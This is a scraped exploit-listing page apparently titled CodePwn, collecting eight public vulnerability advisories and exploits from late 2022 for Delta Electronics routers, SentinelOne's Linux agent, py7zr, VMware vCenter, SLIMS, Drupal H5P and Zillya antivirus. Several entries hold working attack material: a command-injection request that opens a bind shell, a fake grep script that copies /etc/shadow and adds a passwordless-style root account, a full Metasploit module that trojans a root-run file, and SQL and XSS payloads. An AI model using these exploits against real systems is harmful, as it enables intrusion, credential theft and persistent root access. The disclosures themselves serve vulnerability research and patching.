Latest exploits :: CodePwn

<pre><code>CyberDanube Security Research 20221130-1 ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Delta Electronics DVW-W02W2-E2 vulnerable version| V2.42 fixed version| V2.5.2 CVE number| - impact| High homepage| https://www.deltaww.com found| 2022-08-01 by| T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, "To provide innovative, clean and energy -efficient solutions for a better tomorrow," focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta's business categories include Power Electronics, Automation, and Infrastructure." Source: https://www.deltaww.com/en-US/about/aboutProfile Vulnerable versions ------------------------------------------------------------------------------- DVW-W02W2-E2 / V2.42 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The web server is prone to an authenticated command injection via POST parameters. This is only possible if the "timestamp" parameter is set correctly in the URL. The following proof-of-concept shows how to open a port binding shell on port 8889 with a "utelnetd" listener: =============================================================================== POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1 Host: 192.168.3.148 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 105 Origin: http://192.168.3.148 Connection: close Referer: http://192.168.3.148/MT_ping.htm Cookie: xxid=1973719449 Upgrade-Insecure-Requests: 1 submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=`utelnetd%20-p%208889%20-l%20/bin/ash%20-d` =============================================================================== For accessing the device, the command "netcat" can be used: =============================================================================== $ nc 192.168.3.150 8889 ����!���� BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # =============================================================================== The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update to firmware version V2.5.2. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2022-08-02: Contacting Delta Electronics. 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics. 2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers. 2022-08-30: Asked for an update. 2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching. 2022-10-11: Asked for an update. 2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date. 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day. 2022-10-17: Asked for an update regarding the release; No answer. 2022-10-18: Asked for an update and shifted release date to 2022-10-22. 2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November. 2022-10-21: Asked vendor for a concrete release date; No answer. 2022-10-28: Announced advisory release date for 2022-10-30 to vendor. 2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website. 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF T. Weber / @2022 </code></pre>

<pre><code>CyberDanube Security Research 20221130-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Delta Electronics DX-2100-L1-CN vulnerable version| V1.5.0.10 fixed version| V1.5.0.12 CVE number| - impact| High homepage| https://www.deltaww.com found| 2022-08-01 by| T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, "To provide innovative, clean and energy -efficient solutions for a better tomorrow," focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta's business categories include Power Electronics, Automation, and Infrastructure." Source: https://www.deltaww.com/en-US/about/aboutProfile Vulnerable versions ------------------------------------------------------------------------------- DX-2100-L1-CN / V1.5.0.10 Vulnerability overview ------------------------------------------------------------------------------- 1) Authenticated Command Injection An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the OS from the device in the context of the user "root". Therefore, a full compromization of the device is possible by having credentials for the web service only. 2) Stored Cross-Site Scripting A stored cross-site scripting vulnerability has been identified in the function "net diagnosis" on the device's web configuration service. This can be exploited in the context of a victim's session. Proof of Concept ------------------------------------------------------------------------------- 1) Authenticated Command Injection The parameter "diagnose_address" contains the payload ";ls /;", which basically prints the content of the root directory to the serial terminal of the device. http://192.168.3.150/lform/net_diagnose?action=diagnose&diagnose_type=0&diagnose_address=;ls%20/; The output can be seen in the context of a virtualized firmware clone, as used to find this vulnerability, but is usually invisible to a customer. Therefore, a more visible payload may be commands that interact via the network, like ";ping 192.168.0.10;". This command will ping a device on the corresponding IP address within the local network. 2) Stored Cross-Site Scripting The following code prints the current cached cookies of a user's session to the screen. The JavaScript code will be stored on the device permanently. =============================================================================== POST /lform/urlfilter?action=save HTTP/1.1 Host: 192.168.3.150 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 190 Connection: keep-alive Cookie: language=en_US; userindex=1; loginexpire=1648630746607; session=30 lan_ipaddr=192.168.5.5&lan_netmask=255.255.255.0&src_addr_start=&src_addr_end=&editnum=0&bfilter_urllist=0&url_addr=<script>alert(document.cookie)</script>&src_addr_type=0&filter_state=1 =============================================================================== The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- Update to firmware version V1.5.0.12. Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available. Contact Timeline ------------------------------------------------------------------------------- 2022-08-02: Contacting Delta Electronics. 2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics. 2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers. 2022-08-30: Asked for an update. 2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching. 2022-10-11: Asked for an update. 2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date. 2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day. 2022-10-17: Asked for an update regarding the release; No answer. 2022-10-18: Asked for an update and shifted release date to 2022-10-22. 2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November. 2022-10-21: Asked vendor for a concrete release date; No answer. 2022-10-28: Announced advisory release date for 2022-10-30 to vendor. 2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website. 2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF T. Weber / @2022 </code></pre>

<pre><code>Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability Date: 12/06/2022 Exploit Author: ouch_this_hurts Vendor Homepage: https://www.sentinelone.com/ Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas Version: 22.3.2.5 Tested on: Ubuntu 22.04.x CVE: NA Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :) Protips: - If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother. - If you require me to use HackerOne, I'm not going to bother. - If you dont have a security.txt, how do you expect me to contact you? Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick: Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice! PoC below: 1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit. 2. Create the following `grep` file in that directory and make sure its executable: ```shell cat << SENTINELOOPS > /usr/local/bin/grep #!/bin/bash # I think I'll have the passwds pl0x cat /etc/shadow > /tmp/etc_shadow # password is password :) echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd SENTINELOOPS chmod +x /usr/local/bin/grep ``` 3. Wait for machine to reboot, login as `sentinel_oops:password` :) ``` $ su sentinel_oops Password: # whoami root ``` What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`. So there are potentially other ways of privilege escalation via this "agent"? - `grep` as demonstrated above - `pgrep` examining the binary appears to be vulnerable - `xargs` examining the binary appears to be vulnerable - `cat` examining the binary appears to be vulnerable - `pgrep` examining the binary appears to be vulnerable - `ldd` examining the binary appears to be vulnerable - `lsmod` examining the binary appears to be vulnerable - `mksh` examining the binary appears to be vulnerable - `awk` examining the binary appears to be vulnerable [CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16) </code></pre>

<pre><code>CVE-2022-44900: path traversal vulnerability in py7zr Directory traversal vulnerability in SevenZipFile.extractall() function of the python library py7zr version 0.20.0 and earlier allow attackers to read arbitrary files on the local machine via malicious 7z file extraction. CVE-2022-44900 <https://www.cve.org/CVERecord?id=CVE-2022-44900> vulnerability allows attackers to achieve arbitrary file read and arbitrary file write. To do so, an attacker needs to create a malicious 7z archive containing a symlink to achieve an arbitrary file read and a file with a path traversal payload as name to achieve an arbitrary file write. Exploiting The script used for tests is the following: import py7zr import click @click.command() @click.argument("filename") def main_procedure(filename): with py7zr.SevenZipFile(filename, 'r') as archive: archive.extractall() main_procedure() The vulnerabile function targeted is py7zr.SevenZipFile.extractall(). A lab setup has been built to test for vulnerabilities. Directories structured as follow were used: ├── start_point │ ├── archive.7z │ └── py7zr_test.py └── target ├── write └── read The start_point directory contains the script used for tests and the malicious archive containing the path traversal payload in the form of the filename of an archived file. To achieve an arbitrary file read, one of the files in the archives needs to have ../target/write set as name. The content of the file will be written into target/write. In a similar way, to achieve an arbitrary file read, a symlink pointing to ../target/read needs to be present in the archive. When extracted the symlink will consist of the content of target/read. Disclosure timeline 29/10/2022 - Maintainer was notified privately of the vulnerabilities 30/10/2022 - Response from maintainer 01/11/2022 - Release of patched version 0.20.1 01/11/2022 - CVE ID request 06/12/2022 - CVE ID obtained 06/12/2022 - Public disclosure ------------------------------ </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'VMware vCenter vScalation Priv Esc', 'Description' => %q{ This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the cis group to write to the file, which will execute as root on vmware-vmon service restart or host reboot. This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488. The following versions should be vulnerable: vCenter 7.0 before U2c vCenter 6.7 before U3o vCenter 6.5 before U3q }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Yuval Lazar' # original PoC, analysis ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/' ], [ 'CVE', '2021-22015' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html' ] ], 'DisclosureDate' => '2021-09-21', 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 1800 # 30min }, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS], 'AKA' => ['vScalation'] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end def java_wrapper_vmon '/usr/lib/vmware-vmon/java-wrapper-vmon' end def check group_owner = cmd_exec("stat -c \"%G\" \"#{java_wrapper_vmon}\"") if writable?(java_wrapper_vmon) && group_owner == 'cis' return CheckCode::Appears("#{java_wrapper_vmon} is writable and owned by cis group") end CheckCode::Safe("#{java_wrapper_vmon} not owned by 'cis' group (owned by '#{group_owner}'), or not writable") end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # backup the original file @backup = read_file(java_wrapper_vmon) path = store_loot( 'java-wrapper-vmon.text', 'text/plain', rhost, @backup, 'java-wrapper-vmon.text' ) print_good("Original #{java_wrapper_vmon} backed up to #{path}") # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" print_status("Writing payload to #{payload_path}") upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup payload_path # write trojaned file # we want to write our payload towards the top to ensure it gets run # writing it at the bottom of the file results in the payload not being run print_status("Writing trojaned #{java_wrapper_vmon}") write_file(java_wrapper_vmon, @backup.gsub('#!/bin/sh', "#!/bin/sh\n#{payload_path} &\n")) # try to restart the service print_status('Attempting to restart vmware-vmon service (systemctl restart vmware-vmon.service)') service_restart = cmd_exec('systemctl restart vmware-vmon.service') # one error i'm seeing when using vsphere-client is: Failed to restart vmware-vmon.service: The name org.freedesktop.PolicyKit1 was not provided by any .service files if service_restart.downcase.include?('access denied') || service_restart.downcase.include?('failed') print_bad('vmware-vmon service needs to be restarted, or host rebooted to obtain shell.') end print_status("Waiting #{datastore['WfsDelay']} seconds for shell") end def cleanup unless @backup.nil? print_status("Replacing trojaned #{java_wrapper_vmon} with original") write_file(java_wrapper_vmon, @backup) end super end end </code></pre>

<pre><code>## Title: Senayan Library Management System v9.5.1 a.k.a SLIMS 9 SQLi ## Author: nu11secur1ty ## Date: 12.06.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://slims.web.id/web/news/rilis-9.5.1/ ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1 ## Description: The manual insertion `point 4` appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\mmceb8f9w8n0s3mutza4ttmxzo5it8hzknbdy6mv.again.com\\ejf'))+' was submitted in the manual insertion `point 4` testing. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can execute a very dangerous `subquery` to view very sensitive information. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL GET /slims9_bulian-9.5.1/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb%27%2b(select*from(select(sleep(5)))a)%2b%27&membershipType=a&collType=aaaa HTTP/1.1 Host: pwnedhost.com Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SenayanAdmin=tc5upjgvv2j3mid2ur5tdmmpje; admin_logged_in=1; SenayanMember=schm4nbtgbb5i1tbeonr6cav3u Connection: close ``` [+] Response: ```MySQL HTTP/1.1 200 OK Date: Tue, 06 Dec 2022 13:51:38 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block Content-Length: 4120 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head><title>Loan Report by Class Report</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/> <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/> <link rel="stylesheet" type="text/css" href="/slims9_bulian-9.5.1/css/bootstrap.min.css"/> <link rel="stylesheet" type="text/css" href="/slims9_bulian-9.5.1/admin/admin_template/default/style.css?31085233"/> <script type="text/javascript" src="/slims9_bulian-9.5.1/js/jquery.js"></script> <script type="text/javascript" src="/slims9_bulian-9.5.1/js/gui.js"></script> </head> <body> <div id="pageContent"> <div class="mb-2">Loan Recap By Class bbbb'+(select*from(select(sleep(5)))a)+' for year 2002 <a class="s-btn btn btn-default printReport" onclick="window.print()" href="#">Print Current Page</a><a href="../xlsoutput.php" class="s-btn btn btn-default" target="_BLANK">Export to spreadsheet format</a> <a class="s-btn btn btn-info notAJAX openPopUp" href="/slims9_bulian-9.5.1/admin/modules/reporting/pop_chart.php" width="700" height="530" title="Loan Recap By Class">Show in chart/plot</a></div> <table class="s-table table table-sm table-bordered"><tr><th class="dataListHeaderPrinted">Classification</th><th class="dataListHeaderPrinted">Jan</th><th class="dataListHeaderPrinted">Feb</th><th class="dataListHeaderPrinted">Mar</th><th class="dataListHeaderPrinted">Apr</th><th class="dataListHeaderPrinted">May</th><th class="dataListHeaderPrinted">Jun</th><th class="dataListHeaderPrinted">Jul</th><th class="dataListHeaderPrinted">Aug</th><th class="dataListHeaderPrinted">Sep</th><th class="dataListHeaderPrinted">Oct</th><th class="dataListHeaderPrinted">Nov</th><th class="dataListHeaderPrinted">Dec</th></tr><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb'+(select*from(select(sleep(5)))a)+'90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div> <div class="loader"></div>  <script type="text/javascript"> // if we are inside iframe jQuery(document).ready(function () { }); </script> </body> </html> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.1) ## Proof and Exploit: [href](https://streamable.com/gthu91) ## Time spent `04:00:00` </code></pre>

<pre><code>------------------------------------------------------------------ Drupal H5P Module <= 2.0.0 (isValidPackage) Zip Slip Vulnerability ------------------------------------------------------------------ [-] Software Link: https://www.drupal.org/project/h5p [-] Affected Versions: Version 2.0.0-alpha2 and prior versions. Version 7.x-1.50 and prior versions. [-] Vulnerability Description: The vulnerability is located within the H5PValidator::isValidPackage() method. This implements the following check in order to skip any file or folder starting with a dot or underscore within the uploaded h5p archive: 891. $fileName = $zip->statIndex($i)['name']; 892. 893. if (preg_match('/(^[\._]|\/[\._])/', $fileName) !== 0) { 894. continue; // Skip any file or folder starting with a . or _ 894. } This regex check should be enough to prevent path traversal attacks through zipped filenames (Zip Slip attacks), because it checks for the string “/.” within the filename, thus preventing directory traversal attacks. However, the vulnerability exists if Drupal is running on a Windows server, because in this case the attacker can provide a malicious h5p archive containing a filename with path traversal sequences like “..\..\..”, which would bypass the above regex check. This can be exploited to write (or overwrite) semi-arbitrary files in the file system via directory traversal sequences, potentially leading to Stored Cross-Site Scripting (XSS) and other kind of attacks. [-] Solution: No official solution is currently available. [-] Disclosure Timeline: [22/11/2021] - Vendor notified [28/02/2022] - Vendor proposed a possible patch [28/02/2022] - Vendor notified about the ineffective patch, provided a fix suggestion [01/03/2022] - Vendor fixed the previous patch [30/03/2022] - Asked update about the public disclosure and release of a patch, no response [22/11/2022] - After one year still no official solution available [03/12/2022] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a CVE identifier for this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://security.drupal.org/node/175968 [-] Original Advisory: http://karmainsecurity.com/KIS-2022-06 </code></pre>

<pre><code># Title: Zillya Total Security - Link Following Local Privilege Escalation (AVGater) Vulnerability # Date: 02.12.2022 # Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://zillya.com/ # Software Link: (https://download.zillya.com/ZTS3.exe) / (https://download.zillya.com/ZIS3.exe) # Version: IS (3.0.2367.0) / TS (3.0.2368.0) # Tested on: Windows 10 Professional x64 # PoC Video: https://youtu.be/vRCZR1kd89Q Vulnerabiliy Description: --------------------------------------- Zillya's processes run in SYSTEM privileges. The user with low privileges in the system can copy any file they want to any location by using the quarantine module in Zillya. This is an example of AVGater vulnerabilities that are often found in antivirus programs. You can read the article about AVGater vulnerabilities here: https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/ The vulnerability affects both "Zillya Total Security" and "Zillya Internet Security" products. Step by step produce: --------------------------------------- 1 - Attackers create new folder and into malicious file. It can be a DLL or any file. 2 - Attacker waits for "Zillya Total Security" or "Zillya Internet Security" to quarantine him. 3 - The created folder is linked with the Google Symbolic Link Tools "Create Mount Point" tools to the folder that the current user does not have write permission to. You can find these tools here: https://github.com/googleprojectzero/symboliclink-testing-tools 4 - Restores the quarantined file. When checked, it is seen that the file has been moved to an unauthorized location. This is evidence of escalation vulnerability. An attacker with an unauthorized user can write to directories that require authorization. Using techniques such as DLL hijacking, it can gain access to SYSTEM privileges. Advisories: --------------------------------------- Developers should not allow unauthorized users to restore from quarantine unless necessary. Also, it should be checked whether the target file has been copied to the original location. Unless necessary, users should not be able to interfere with processes running with SYSTEM privileges. All processes on the user's side should be run with normal privileges. Disclosure Timeline: --------------------------------------- 13.11.2022 - Vulnerability reported via email but no response was given and the fix was not released. 02.12.2022 - Full disclosure. </code></pre>